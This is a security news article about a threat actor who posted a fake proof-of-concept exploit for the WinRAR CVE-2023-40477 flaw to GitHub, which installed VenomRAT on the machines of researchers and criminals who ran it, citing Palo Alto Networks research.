Fake WinRAR PoC Exploit Conceals VenomRAT Malware

A supposed exploit for a notable RCE vulnerability in the popular Windows file-archiving utility delivers a big sting for unwitting researchers and cybercriminals.

In a new twist on the cybercrime penchant for trojanizing things, a threat actor recently pounced upon a hot vulnerability disclosure to create a fake proof of concept (PoC) exploit that concealed the VenomRAT malware.
According to
research from Palo Alto Networks
, the cyberattacker, who goes by whalersplonk, took advantage of a very real remote code execution (RCE) security bug in WinRAR (CVE-2023-40477) that was made public on Aug. 17. The attacker quickly pulled together a convincing but fake PoC for the bug, which it pushed out to a GitHub repository the same week knowing that the flaw would attract attention — WinRAR, after all, has more than 500 million users worldwide.
The PoC was believable because it was based on a publicly available PoC script for a SQL injection vulnerability in an application called GeoServer, according to the researchers. In reality, once opened, it kicked off an infection chain that ended with the VenomRAT payload being installed on victim computers.
VenomRAT appeared for sale in Dark Web forums
over the summer, loaded with spyware and persistence capabilities.
While this sort of gambit would at first appear to be part of
the tried-and-true tradition of targeting security researchers
with espionage tools, Palo Alto researchers think it was actually more of a lark for the perpetrator.
It is likely [that] the actors are opportunistic and looking to compromise other miscreants trying to adopt new vulnerabilities into their operations, according to the firms research, issued Sept. 19. The actors acted quickly to capitalize on the severity of an RCE in a popular application.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Fake WinRAR PoC Exploit Conceals VenomRAT Malware